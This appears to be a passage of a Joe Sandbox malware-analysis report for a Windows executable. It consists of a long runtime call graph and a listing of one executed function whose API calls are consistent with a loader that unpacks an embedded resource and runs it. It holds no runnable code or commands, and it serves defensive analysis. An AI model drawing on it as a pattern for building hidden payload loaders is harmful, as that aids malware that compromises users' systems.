___endstdio 62 API calls 13443->13444 13444->13358 13445->13288 13448 413e6d _memset 13446->13448 13455 413f1f 13446->13455 13456 417625 13448->13456 13450 40ce09 __atodbl_l 5 API calls 13452 413fca 13450->13452 13452->13247 13454 417426 ___crtLCMapStringA 97 API calls 13454->13455 13455->13450 13457 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13456->13457 13458 417638 13457->13458 13466 41746b 13458->13466 13461 417426 13462 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13461->13462 13463 417439 13462->13463 13532 417081 13463->13532 13467 4174b7 13466->13467 13468 41748c GetStringTypeW 13466->13468 13469 4174a4 13467->13469 13471 41759e 13467->13471 13468->13469 13470 4174ac GetLastError 13468->13470 13472 4174f0 MultiByteToWideChar 13469->13472 13489 417598 13469->13489 13470->13467 13494 417a20 GetLocaleInfoA 13471->13494 13479 41751d 13472->13479 13472->13489 13474 40ce09 __atodbl_l 5 API calls 13476 413eda 13474->13476 13476->13461 13477 4175ef GetStringTypeA 13482 41760a 13477->13482 13477->13489 13478 417532 _memset __crtCompareStringA_stat 13481 41756b MultiByteToWideChar 13478->13481 13478->13489 13479->13478 13483 40b84d _malloc 62 API calls 13479->13483 13485 417581 GetStringTypeW 13481->13485 13486 417592 13481->13486 13487 40b6b5 ___endstdio 62 API calls 13482->13487 13483->13478 13485->13486 13490 4147ae 13486->13490 13487->13489 13489->13474 13491 4147ba 13490->13491 13492 4147cb 13490->13492 13491->13492 13493 40b6b5 ___endstdio 62 API calls 13491->13493 13492->13489 13493->13492 13495 417a53 13494->13495 13496 417a4e 13494->13496 13525 416f54 13495->13525 13498 40ce09 __atodbl_l 5 API calls 13496->13498 13499 4175c2 13498->13499 13499->13477 13499->13489 13500 417a69 13499->13500 13501 417aa9 GetCPInfo 13500->13501 13505 417b33 13500->13505 13502 417ac0 13501->13502 13503 417b1e MultiByteToWideChar 13501->13503 13502->13503 13506 417ac6 GetCPInfo 13502->13506 13503->13505 13509 417ad9 _strlen 13503->13509 13504 40ce09 __atodbl_l 5 API calls 13507 4175e3 13504->13507 13505->13504 13506->13503 13508 417ad3 13506->13508 13507->13477 13507->13489 13508->13503 13508->13509 13510 40b84d _malloc 62 API calls 13509->13510 13514 417b0b _memset __crtCompareStringA_stat 13509->13514 13510->13514 13511 417b68 MultiByteToWideChar 13512 417b80 13511->13512 13513 417b9f 13511->13513 13516 417ba4 13512->13516 13517 417b87 WideCharToMultiByte 13512->13517 13515 4147ae __freea 62 API calls 13513->13515 13514->13505 13514->13511 13515->13505 13518 417bc3 13516->13518 13519 417baf WideCharToMultiByte 13516->13519 13517->13513 13520 411cba __calloc_crt 62 API calls 13518->13520 13519->13513 13519->13518 13521 417bcb 13520->13521 13521->13513 13522 417bd4 WideCharToMultiByte 13521->13522 13522->13513 13523 417be6 13522->13523 13524 40b6b5 ___endstdio 62 API calls 13523->13524 13524->13513 13528 41a354 13525->13528 13529 41a36d 13528->13529 13530 41a125 strtoxl 86 API calls 13529->13530 13531 416f65 13530->13531 13531->13496 13533 4170a2 LCMapStringW 13532->13533 13537 4170bd 13532->13537 13534 4170c5 GetLastError 13533->13534 13533->13537 13534->13537 13535 4172bb 13539 417a20 ___ansicp 86 API calls 13535->13539 13536 417117 13538 417130 MultiByteToWideChar 13536->13538 13560 4172b2 13536->13560 13537->13535 13537->13536 13547 41715d 13538->13547 13538->13560 13541 4172e3 13539->13541 13540 40ce09 __atodbl_l 5 API calls 13542 413efa 13540->13542 13543 4173d7 LCMapStringA 13541->13543 13544 4172fc 13541->13544 13541->13560 13542->13454 13578 417333 13543->13578 13545 417a69 ___convertcp 69 API calls 13544->13545 13549 41730e 13545->13549 13546 4171ae MultiByteToWideChar 13550 4171c7 LCMapStringW 13546->13550 13572 4172a9 13546->13572 13548 40b84d _malloc 62 API calls 13547->13548 13556 417176 __crtCompareStringA_stat 13547->13556 13548->13556 13552 417318 LCMapStringA 13549->13552 13549->13560 13554 4171e8 13550->13554 13550->13572 13551 4173fe 13558 40b6b5 ___endstdio 62 API calls 13551->13558 13551->13560 13563 41733a 13552->13563 13552->13578 13553 4147ae __freea 62 API calls 13553->13560 13557 4171f1 13554->13557 13562 41721a 13554->13562 13555 40b6b5 ___endstdio 62 API calls 13555->13551 13556->13546 13556->13560 13561 417203 LCMapStringW 13557->13561 13557->13572 13558->13560 13559 417235 __crtCompareStringA_stat 13564 417269 LCMapStringW 13559->13564 13559->13572 13560->13540 13561->13572 13562->13559 13566 40b84d _malloc 62 API calls 13562->13566 13565 41734b _memset __crtCompareStringA_stat 13563->13565 13567 40b84d _malloc 62 API calls 13563->13567 13568 417281 WideCharToMultiByte 13564->13568 13569 4172a3 13564->13569 13571 417389 LCMapStringA 13565->13571 13565->13578 13566->13559 13567->13565 13568->13569 13570 4147ae __freea 62 API calls 13569->13570 13570->13572 13573 4173a5 13571->13573 13574 4173a9 13571->13574 13572->13553 13577 4147ae __freea 62 API calls 13573->13577 13576 417a69 ___convertcp 69 API calls 13574->13576 13576->13573 13577->13578 13578->13551 13578->13555 13579->13250 13581 41358c 13580->13581 13582 41046e __encode_pointer 6 API calls 13581->13582 13583 4135a4 13581->13583 13582->13581 13583->12708 13587 40d281 13584->13587 13586 40d2ca 13586->12710 13588 40d28d _doexit 13587->13588 13595 40e806 13588->13595 13594 40d2ae _doexit 13594->13586 13596 40d6e0 __lock 62 API calls 13595->13596 13597 40d292 13596->13597 13598 40d196 13597->13598 13599 4104e9 __decode_pointer 6 API calls 13598->13599 13600 40d1aa 13599->13600 13601 4104e9 __decode_pointer 6 API calls 13600->13601 13602 40d1ba 13601->13602 13610 40d23d 13602->13610 13618 40e56a 13602->13618 13604 41046e __encode_pointer 6 API calls 13605 40d232 13604->13605 13607 41046e __encode_pointer 6 API calls 13605->13607 13606 40d1d8 13609 40d1fc 13606->13609 13614 40d224 13606->13614 13631 411d06 13606->13631 13607->13610 13609->13610 13611 411d06 __realloc_crt 72 API calls 13609->13611 13612 40d212 13609->13612 13615 40d2b7 13610->13615 13611->13612 13612->13610 13613 41046e __encode_pointer 6 API calls 13612->13613 13613->13614 13614->13604 13680 40e80f 13615->13680 13619 40e576 _doexit 13618->13619 13620 40e5a3 13619->13620 13621 40e586 13619->13621 13623 40e5e4 HeapSize 13620->13623 13625 40d6e0 __lock 62 API calls 13620->13625 13622 40bfc1 __controlfp_s 62 API calls 13621->13622 13624 40e58b 13622->13624 13628 40e59b _doexit 13623->13628 13626 40e744 __controlfp_s 6 API calls 13624->13626 13627 40e5b3 ___sbh_find_block 13625->13627 13626->13628 13636 40e604 13627->13636 13628->13606 13635 411d0f 13631->13635 13633 411d4e 13633->13609 13634 411d2f Sleep 13634->13635 13635->13633 13635->13634 13640 40e34f 13635->13640 13639 40d606 LeaveCriticalSection 13636->13639 13638 40e5df 13638->13623 13638->13628 13639->13638 13641 40e35b _doexit 13640->13641 13642 40e370 13641->13642 13643 40e362 13641->13643 13645 40e383 13642->13645 13646 40e377 13642->13646 13644 40b84d _malloc 62 API calls 13643->13644 13665 40e36a __dosmaperr _doexit 13644->13665 13653 40e4f5 13645->13653 13668 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 13645->13668 13647 40b6b5 ___endstdio 62 API calls 13646->13647 13647->13665 13648 40e528 13649 40d2e3 __calloc_impl 6 API calls 13648->13649 13652 40e52e 13649->13652 13650 40d6e0 __lock 62 API calls 13650->13668 13651 40e4fa HeapReAlloc 13651->13653 13651->13665 13654 40bfc1 __controlfp_s 62 API calls 13652->13654 13653->13648 13653->13651 13655 40e54c 13653->13655 13656 40d2e3 __calloc_impl 6 API calls 13653->13656 13659 40e542 13653->13659 13654->13665 13657 40bfc1 __controlfp_s 62 API calls 13655->13657 13655->13665 13656->13653 13660 40e555 GetLastError 13657->13660 13661 40bfc1 __controlfp_s 62 API calls 13659->13661 13660->13665 13674 40e4c3 13661->13674 13662 40e41b HeapAlloc 13662->13668 13663 40e470 HeapReAlloc 13663->13668 13664 40e4c8 GetLastError 13664->13665 13665->13635 13666 40def2 ___sbh_alloc_block 5 API calls 13666->13668 13667 40e4db 13667->13665 13670 40bfc1 __controlfp_s 62 API calls 13667->13670 13668->13648 13668->13650 13668->13662 13668->13663 13668->13665 13668->13666 13668->13667 13669 40d2e3 __calloc_impl 6 API calls 13668->13669 13672 40e4be 13668->13672 13675 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 13668->13675 13676 40e493 13668->13676 13669->13668 13671 40e4e8 13670->13671 13671->13660 13671->13665 13673 40bfc1 __controlfp_s 62 API calls 13672->13673 13673->13674 13674->13664 13674->13665 13675->13668 13679 40d606 LeaveCriticalSection 13676->13679 13678 40e49a 13678->13668 13679->13678 13683 40d606 LeaveCriticalSection 13680->13683 13682 40d2bc 13682->13594 13683->13682 13687 40b9aa _doexit _strnlen 13684->13687 13685 40b9b8 13686 40bfc1 __controlfp_s 62 API calls 13685->13686 13688 40b9bd 13686->13688 13687->13685 13690 40b9ec 13687->13690 13689 40e744 __controlfp_s 6 API calls 13688->13689 13694 40b9cd _doexit 13689->13694 13691 40d6e0 __lock 62 API calls 13690->13691 13692 40b9f3 13691->13692 13741 40b917 13692->13741 13694->12714 13698 4017cc _memcpy_s 13697->13698 13698->12718 13701 40af70 13699->13701 13700 40b84d _malloc 62 API calls 13700->13701 13701->13700 13702 40af8a 13701->13702 13703 40d2e3 __calloc_impl 6 API calls 13701->13703 13705 40af8c std::bad_alloc::bad_alloc 13701->13705 13702->12723 13703->13701 13707 40d2bd __cinit 73 API calls 13705->13707 13709 40afb2 13705->13709 13707->13709 13955 40af49 13709->13955 13710 40afca 13712 401903 lstrlenA 13711->13712 13713 4018fc 13711->13713 13967 4017e0 13712->13967 13713->12746 13716 401940 GetLastError 13718 40194b MultiByteToWideChar 13716->13718 13719 40198d 13716->13719 13717 401996 13717->12746 13720 4017e0 77 API calls 13718->13720 13719->13717 13983 401030 GetLastError 13719->13983 13721 401970 MultiByteToWideChar 13720->13721 13721->13719 13724 40af66 74 API calls 13723->13724 13725 40187c 13724->13725 13726 401885 SysAllocString 13725->13726 13727 4018a4 13725->13727 13726->13727 13727->12748 13729 40231a SafeArrayUnaccessData 13728->13729 13729->12755 13731 4019aa InterlockedDecrement 13730->13731 13736 4019df VariantClear 13730->13736 13732 4019b8 13731->13732 13731->13736 13733 4019c2 SysFreeString 13732->13733 13735 4019c9 13732->13735 13732->13736 13733->13735 13992 40aec0 13735->13992 13736->12763 13738 401571 13737->13738 13740 401582 13737->13740 13998 40afe0 13738->13998 13740->12726 13740->13740 13742 40b92c 13741->13742 13743 40b930 13741->13743 13747 40ba18 13742->13747 13743->13742 13745 40b942 _strlen 13743->13745 13750 40eeab 13743->13750 13745->13742 13760 40edfb 13745->13760 13954 40d606 LeaveCriticalSection 13747->13954 13749 40ba1f 13749->13694 13751 40eec6 13750->13751 13752 40ef2b 13750->13752 13751->13752 13753 40eecc WideCharToMultiByte 13751->13753 13754 411cba __calloc_crt 62 API calls 13751->13754 13755 40eeef WideCharToMultiByte 13751->13755 13759 40b6b5 ___endstdio 62 API calls 13751->13759 13763 414d44 13751->13763 13752->13745 13753->13751 13753->13752 13754->13751 13755->13751 13756 40ef37 13755->13756 13757 40b6b5 ___endstdio 62 API calls 13756->13757 13757->13752 13759->13751 13855 40ed0d 13760->13855 13764 414d76 13763->13764 13765 414d59 13763->13765 13767 414dd4 13764->13767 13809 417e7e 13764->13809 13766 40bfc1 __controlfp_s 62 API calls 13765->13766 13768 414d5e 13766->13768 13769 40bfc1 __controlfp_s 62 API calls 13767->13769 13771 40e744 __controlfp_s 6 API calls 13768->13771 13798 414d6e 13769->13798 13771->13798 13773 414db5 13775 414e12 13773->13775 13776 414de7 13773->13776 13777 414dcb 13773->13777 13775->13798 13820 414c98 13775->13820 13779 411c75 __malloc_crt 62 API calls 13776->13779 13776->13798 13780 40eeab ___wtomb_environ 119 API calls 13777->13780 13782 414df7 13779->13782 13783 414dd0 13780->13783 13782->13775 13789 411c75 __malloc_crt 62 API calls 13782->13789 13782->13798 13783->13767 13783->13775 13784 414e8f 13785 414f7a 13784->13785 13790 414e98 13784->13790 13787 40b6b5 ___endstdio 62 API calls 13785->13787 13786 414e41 13788 40b6b5 ___endstdio 62 API calls 13786->13788 13787->13798 13793 414e4b 13788->13793 13789->13775 13791 411d54 __recalloc_crt 73 API calls 13790->13791 13790->13798 13794 414e51 _strlen 13791->13794 13792 414f5e 13796 40b6b5 ___endstdio 62 API calls 13792->13796 13792->13798 13793->13794 13824 411d54 13793->13824 13794->13792 13797 411cba __calloc_crt 62 API calls 13794->13797 13794->13798 13796->13798 13799 414efb _strlen 13797->13799 13798->13751 13799->13792 13800 40ef42 _strcpy_s 62 API calls 13799->13800 13801 414f14 13800->13801 13802 414f28 SetEnvironmentVariableA 13801->13802 13805 40e61c __invoke_watson 10 API calls 13801->13805 13803 414f49 13802->13803 13804 414f52 13802->13804 13806 40bfc1 __controlfp_s 62 API calls 13803->13806 13807 40b6b5 ___endstdio 62 API calls 13804->13807 13808 414f25 13805->13808 13806->13804 13807->13792 13808->13802 13829 417dc2 13809->13829 13811 414d89 13811->13767 13811->13773 13812 414cea 13811->13812 13813 414cfb 13812->13813 13818 414d3b 13812->13818 13814 411cba __calloc_crt 62 API calls 13813->13814 13815 414d12 13814->13815 13816 414d24 13815->13816 13817 40e79a __amsg_exit 62 API calls 13815->13817 13816->13818 13836 417d6d 13816->13836 13817->13816 13818->13773 13822 414ca6 13820->13822 13821 40edfb __fassign 106 API calls 13821->13822 13822->13821 13823 414ccd 13822->13823 13823->13784 13823->13786 13827 411d5d 13824->13827 13826 411da0 13826->13794 13827->13826 13828 411d81 Sleep 13827->13828 13844 40b783 13827->13844 13828->13827 13830 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13829->13830 13831 417dd6 13830->13831 13832 40bfc1 __controlfp_s 62 API calls 13831->13832 13835 417df4 __mbschr_l 13831->13835 13833 417de4 13832->13833 13834 40e744 __controlfp_s 6 API calls 13833->13834 13834->13835 13835->13811 13837 417d7e _strlen 13836->13837 13843 417d7a 13836->13843 13838 40b84d _malloc 62 API calls 13837->13838 13839 417d91 13838->13839 13840 40ef42 _strcpy_s 62 API calls 13839->13840 13839->13843 13841 417da3 13840->13841 13842 40e61c __invoke_watson 10 API calls 13841->13842 13841->13843 13842->13843 13843->13816 13845 40b792 13844->13845 13846 40b7ba 13844->13846 13845->13846 13847 40b79e 13845->13847 13848 40b7cf 13846->13848 13851 40e56a __msize 63 API calls 13846->13851 13850 40bfc1 __controlfp_s 62 API calls 13847->13850 13849 40e34f _realloc 71 API calls 13848->13849 13854 40b7b3 _memset 13849->13854 13852 40b7a3 13850->13852 13851->13848 13853 40e744 __controlfp_s 6 API calls 13852->13853 13853->13854 13854->13827 13856 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13855->13856 13857 40ed21 13856->13857 13858 40ed42 13857->13858 13859 40ed75 13857->13859 13869 40ed2a 13857->13869 13860 40bfc1 __controlfp_s 62 API calls 13858->13860 13862 40ed99 13859->13862 13863 40ed7f 13859->13863 13861 40ed47 13860->13861 13864 40e744 __controlfp_s 6 API calls 13861->13864 13866 40eda1 13862->13866 13867 40edb5 13862->13867 13865 40bfc1 __controlfp_s 62 API calls 13863->13865 13864->13869 13870 40ed84 13865->13870 13873 414b9e 13866->13873 13893 414b5c 13867->13893 13869->13745 13872 40e744 __controlfp_s 6 API calls 13870->13872 13872->13869 13874 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13873->13874 13875 414bb2 13874->13875 13876 414bd3 13875->13876 13878 414c06 13875->13878 13890 414bbb 13875->13890 13877 40bfc1 __controlfp_s 62 API calls 13876->13877 13879 414bd8 13877->13879 13880 414c10 13878->13880 13881 414c2a 13878->13881 13885 40e744 __controlfp_s 6 API calls 13879->13885 13882 40bfc1 __controlfp_s 62 API calls 13880->13882 13883 414c34 13881->13883 13884 414c49 13881->13884 13886 414c15 13882->13886 13898 417c1d 13883->13898 13888 414b5c ___crtCompareStringA 95 API calls 13884->13888 13885->13890 13889 40e744 __controlfp_s 6 API calls 13886->13889 13891 414c63 13888->13891 13889->13890 13890->13869 13891->13890 13892 40bfc1 __controlfp_s 62 API calls 13891->13892 13892->13890 13894 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13893->13894 13895 414b6f 13894->13895 13914 4147ec 13895->13914 13899 417c33 13898->13899 13909 417c58 ___ascii_strnicmp 13898->13909 13900 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13899->13900 13901 417c3e 13900->13901 13902 417c43 13901->13902 13903 417c78 13901->13903 13904 40bfc1 __controlfp_s 62 API calls 13902->13904 13905 417c82 13903->13905 13913 417caa 13903->13913 13906 417c48 13904->13906 13907 40bfc1 __controlfp_s 62 API calls 13905->13907 13908 40e744 __controlfp_s 6 API calls 13906->13908 13910 417c87 13907->13910 13908->13909 13909->13890 13911 40e744 __controlfp_s 6 API calls 13910->13911 13911->13909 13912 4168fc 97 API calls __tolower_l 13912->13913 13913->13909 13913->13912 13915 414818 CompareStringW 13914->13915 13920 41482f strncnt 13914->13920 13916 41483b GetLastError 13915->13916 13915->13920 13916->13920 13917 40ce09 __atodbl_l 5 API calls 13918 414b5a 13917->13918 13918->13869 13919 414a95 13921 417a20 ___ansicp 86 API calls 13919->13921 13920->13919 13922 4148a4 13920->13922 13936 414881 13920->13936 13923 414abb 13921->13923 13924 414962 MultiByteToWideChar 13922->13924 13927 4148e6 GetCPInfo 13922->13927 13922->13936 13925 414b1c CompareStringA 13923->13925 13928 417a69 ___convertcp 69 API calls 13923->13928 13923->13936 13932 414982 13924->13932 13924->13936 13926 414b3a 13925->13926 13925->13936 13929 40b6b5 ___endstdio 62 API calls 13926->13929 13930 4148f7 13927->13930 13927->13936 13931 414ae0 13928->13931 13933 414b40 13929->13933 13930->13924 13930->13936 13935 417a69 ___convertcp 69 API calls 13931->13935 13931->13936 13937 40b84d _malloc 62 API calls 13932->13937 13945 41499f __crtCompareStringA_stat 13932->13945 13938 40b6b5 ___endstdio 62 API calls 13933->13938 13934 4149d9 MultiByteToWideChar 13939 4149f2 MultiByteToWideChar 13934->13939 13953 414a83 13934->13953 13940 414b01 13935->13940 13936->13917 13937->13945 13938->13936 13942 414a09 13939->13942 13939->13953 13943 414b16 13940->13943 13944 414b0a 13940->13944 13941 4147ae __freea 62 API calls 13941->13936 13947 414a1f __crtCompareStringA_stat 13942->13947 13949 40b84d _malloc 62 API calls 13942->13949 13943->13925 13946 40b6b5 ___endstdio 62 API calls 13944->13946 13945->13934 13945->13936 13946->13936 13948 414a53 MultiByteToWideChar 13947->13948 13947->13953 13950 414a66 CompareStringW 13948->13950 13951 414a7d 13948->13951 13949->13947 13950->13951 13952 4147ae __freea 62 API calls 13951->13952 13952->13953 13953->13941 13954->13749 13961 40d0f5 13955->13961 13958 40cd39 13959 40cd6e RaiseException 13958->13959 13960 40cd62 13958->13960 13959->13710 13960->13959 13962 40d115 _strlen 13961->13962 13966 40af59 13961->13966 13963 40b84d _malloc 62 API calls 13962->13963 13962->13966 13964 40d128 13963->13964 13965 40ef42 _strcpy_s 62 API calls 13964->13965 13964->13966 13965->13966 13966->13958 13968 4017f3 13967->13968 13969 4017e9 EntryPoint 13967->13969 13970 401805 13968->13970 13971 4017fb EntryPoint 13968->13971 13969->13968 13972 40180e EntryPoint 13970->13972 13973 401818 13970->13973 13971->13970 13972->13973 13974 40183e 13973->13974 13977 40b783 __recalloc 72 API calls 13973->13977 13980 401844 13973->13980 13975 40b6b5 ___endstdio 62 API calls 13974->13975 13975->13980 13981 40182d 13977->13981 13978 40186d MultiByteToWideChar 13978->13716 13978->13717 13979 40184e EntryPoint 13979->13980 13980->13978 13980->13979 13985 40b743 13980->13985 13981->13980 13982 401834 EntryPoint 13981->13982 13982->13974 13984 401044 EntryPoint 13983->13984 13986 40e231 __calloc_impl 62 API calls 13985->13986 13987 40b75d 13986->13987 13988 40bfc1 __controlfp_s 62 API calls 13987->13988 13991 40b779 13987->13991 13989 40b770 13988->13989 13990 40bfc1 __controlfp_s 62 API calls 13989->13990 13989->13991 13990->13991 13991->13980 13993 40b6b5 _doexit 13992->13993 13994 40b73d _doexit 13993->13994 13995 40b714 HeapFree 13993->13995 13994->13736 13995->13994 13996 40b727 13995->13996 13997 40bfc1 __controlfp_s 62 API calls 13996->13997 13997->13994 13999 40aff8 13998->13999 14000 40b01f __VEC_memcpy 13999->14000 14001 40b027 13999->14001 14000->14001 14001->13740 14003 4104e0 _doexit 6 API calls 14002->14003 14004 40ea5c __init_pointers __initp_misc_winsig 14003->14004 14019 41393d 14004->14019 14007 41046e __encode_pointer 6 API calls 14008 40ea98 14007->14008 14008->12787 14010 40d56f 14009->14010 14011 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 14010->14011 14012 40d59d 14010->14012 14011->14010 14012->12777 14012->12797 14014 4105a2 14013->14014 14018 4105ae 14013->14018 14015 4104e9 __decode_pointer 6 API calls 14014->14015 14015->14018 14016 4105d0 14016->14016 14017 4105c2 TlsFree 14017->14016 14018->14016 14018->14017 14020 41046e __encode_pointer 6 API calls 14019->14020 14021 40ea8e 14020->14021 14021->14007 14024 41265c 14022->14024 14026 4126c9 14024->14026 14028 416836 14024->14028 14025 4127c7 14025->12820 14025->12821 14026->14025 14027 416836 72 API calls _parse_cmdline 14026->14027 14027->14026 14031 4167e3 14028->14031 14032 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14031->14032 14033 4167f6 14032->14033 14033->14024 14035 40e8ea _doexit 14034->14035 14036 40d6e0 __lock 62 API calls 14035->14036 14037 40e8f1 14036->14037 14039 4104e9 __decode_pointer 6 API calls 14037->14039 14043 40e9aa __initterm 14037->14043 14041 40e928 14039->14041 14041->14043 14045 4104e9 __decode_pointer 6 API calls 14041->14045 14042 40e9f2 _doexit 14042->12826 14051 40e9f5 14043->14051 14050 40e93d 14045->14050 14046 40e9e9 14047 40e7ee _doexit 3 API calls 14046->14047 14047->14042 14048 4104e9 6 API calls __decode_pointer 14048->14050 14049 4104e0 6 API calls _doexit 14049->14050 14050->14043 14050->14048 14050->14049 14052 40e9d6 14051->14052 14053 40e9fb 14051->14053 14052->14042 14055 40d606 LeaveCriticalSection 14052->14055 14056 40d606 LeaveCriticalSection 14053->14056 14055->14046 14056->14052

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 20 401c98-401c9a 16->20 18 401c7d-401c83 17->18 19 401c8f-401c91 17->19 18->16 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->14 22->19 34 401cd0-401cd4 23->34 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 44 401f33-401f5d call 401560 38->44 45 401f73-401f75 39->45 46 401f6b-401f72 39->46 40->36 47 401ce2-401cea 40->47 41->42 42->24 43 401cf9-401d09 Module32Next 42->43 43->7 48 401d0f 43->48 44->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->41 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 78 401da0-401da2 77->78 79 401d86-401d88 77->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 95 402482-402487 92->95 98 40221d-40223d 93->98 99 40244f-40245f 93->99 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                          • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                          • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                                          Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

